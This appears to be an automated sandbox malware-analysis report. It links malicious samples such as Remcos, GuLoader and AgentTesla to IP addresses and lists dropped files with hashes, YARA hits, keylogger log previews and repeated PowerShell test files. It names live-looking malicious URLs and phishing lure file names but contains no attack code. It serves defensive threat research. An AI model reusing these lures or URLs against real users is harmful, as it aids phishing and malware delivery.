                                          LocawebServicosdeInternetSABRawb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                          • 191.252.83.213
                                          UZV5A2N5j8.elfGet hashmaliciousMiraiBrowse
                                          • 179.188.242.132
                                          Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                          • 191.252.83.213
                                          Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                          • 191.252.83.213
                                          Urgent Purchase Order (P.O.) No.477764107102024.vbsGet hashmaliciousRemcosBrowse
                                          • 191.252.83.213
                                          https://indexconectada.net.br/Get hashmaliciousUnknownBrowse
                                          • 191.252.185.167
                                          https://www.google.com.pe/url?q=Y7AzKRq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kI3xqbL8&sa=t&url=amp%2F%E2%80%8Bfc%C2%ADcid%E3%80%82io/www/%E2%80%8Brosan%C2%ADasidon%C2%ADiotri%C2%ADcologista%E2%80%8B.co%C2%ADm.%C2%ADbr/lo/lo//nJ5u8/Y21jX2FsbF9lbXBsb3llZXNfY29zdGFfcmljYUBjYXRhbGluYS5jb20=$Get hashmaliciousHtmlDropperBrowse
                                          • 191.252.162.52
                                          SKMBT_77122012816310TD0128_17311_XLS.vbsGet hashmaliciousRemcosBrowse
                                          • 191.252.83.213
                                          wsx.exeGet hashmaliciousUnknownBrowse
                                          • 191.252.83.191
                                          wsx.exeGet hashmaliciousUnknownBrowse
                                          • 191.252.83.191
                                          WANSECURITYUSfile.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.111.213.87
                                          PO-2609202412666 PNG2023-W101_pdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.111.213.87
                                          N2wHyH6p2I.exeGet hashmaliciousWannacryBrowse
                                          • 199.47.198.21
                                          CLOUDFLARENETUSEQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.13.205
                                          https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_AGet hashmaliciousUnknownBrowse
                                          • 104.16.160.168
                                          Custom Export Tax Recovery Form.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.67.128.117
                                          Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 172.67.128.117
                                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                          • 188.114.97.3
                                          https://emojiparqueacuaticoo.site/NClMD/Get hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          file.exeGet hashmaliciousLummaCBrowse
                                          • 104.21.53.8
                                          http://puzzlewood.netGet hashmaliciousUnknownBrowse
                                          • 104.26.7.189
                                          http://www.umb-re.comGet hashmaliciousUnknownBrowse
                                          • 1.1.1.1
                                          na.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 104.23.26.35
                                          ATOM86-ASATOM86NL037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          Custom Export Tax Recovery Form.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          na.rtfGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 178.237.33.50
                                          awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                          • 178.237.33.50
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0enos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbsGet hashmaliciousPureLog Stealer, zgRATBrowse
                                          • 104.20.3.235
                                          • 188.114.97.3
                                          EQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                          • 104.20.3.235
                                          • 188.114.97.3
                                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                          • 104.20.3.235
                                          • 188.114.97.3
                                          Snvlerier.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 104.20.3.235
                                          • 188.114.97.3
                                          3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          • 188.114.97.3
                                          3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          • 188.114.97.3
                                          Snvlerier.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 104.20.3.235
                                          • 188.114.97.3
                                          ASL OTSL 2 ship's Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 104.20.3.235
                                          • 188.114.97.3
                                          https://payrollruntimesheet.weebly.com/verify.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 104.20.3.235
                                          • 188.114.97.3
                                          SecuriteInfo.com.Win32.Evo-gen.25810.23454.exeGet hashmaliciousXWormBrowse
                                          • 104.20.3.235
                                          • 188.114.97.3
                                          No context
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):336
                                          Entropy (8bit):3.342401662472334
                                          Encrypted:false
                                          SSDEEP:6:6ly0Unz65YcIeeDAlMly0Unz6bWAAe5Uly0UnxIR1Sly0UnOvAbWAv:6lTwKecmlTw6bWFe5UlTulTTIbW+
                                          MD5:16E4379BC373D4B5CD3130B4D9F6DC7A
                                          SHA1:F40FF51E062B7B928808400B758A48E7F77C7EC8
                                          SHA-256:DFDBC55402C335E33BEF392F132356C706DE3F972DC76F8BD4CF6DFB38F42814
                                          SHA-512:81FA998584D40B5435B4AA9EF767F8139AB11FC52D4C7F824A00215AA4F78202BA3DCDAA5A0850D9739F75348012C2B577444964D9B017833C38688A9CBA303A
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                          Preview:....[.2.0.2.4./.1.0./.1.4. .0.5.:.1.0.:.3.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.0./.1.4. .0.5.:.1.0.:.3.5. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.0./.1.4. .0.5.:.1.0.:.3.7. .R.u.n.].........[.2.0.2.4./.1.0./.1.4. .0.5.:.1.0.:.4.3. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):962
                                          Entropy (8bit):5.013811273052389
                                          Encrypted:false
                                          SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                          MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                          SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                          SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                          SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                          Malicious:false
                                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):9434
                                          Entropy (8bit):4.928515784730612
                                          Encrypted:false
                                          SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                          MD5:D3594118838EF8580975DDA877E44DEB
                                          SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                          SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                          SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                          Malicious:false
                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1628158735648508
                                          Encrypted:false
                                          SSDEEP:3:NlllulF7///h:NllU
                                          MD5:34C16D1FA50B565A72B382C978CB2D56
                                          SHA1:6502B5517917B40F8E25CCB08620F21E79D15704
                                          SHA-256:612F4AE0F96FA0FEAB88126BFC524CA8D996602FE7EB6D476B91E0F17B852D41
                                          SHA-512:4E8B7DA62F407579C261F9C9942A643B3DF6E7BD10EA736AC4B972C89F3C6E516E391420FE0992799F542945C6E2651E155C10356256C020D68B5A3C153EDDAE
                                          Malicious:false
                                          Preview:@...e................................................@..........
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x72ba8f4e, page size 32768, DirtyShutdown, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):17301504
                                          Entropy (8bit):0.801198713661295
                                          Encrypted:false
                                          SSDEEP:6144:qdfjZb5aXEY2waXEY24URlCe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:oVs4e81ySaKKjLrONseWe
                                          MD5:F251B91E748CC883F4E6C89F43312475
                                          SHA1:683485CDCA758A94021BE6D9467D992A2D656BB9
                                          SHA-256:15B30A08BA81628CA20E4217A0D3AC6ECB422DD0B5FC1456632D159D623550E6
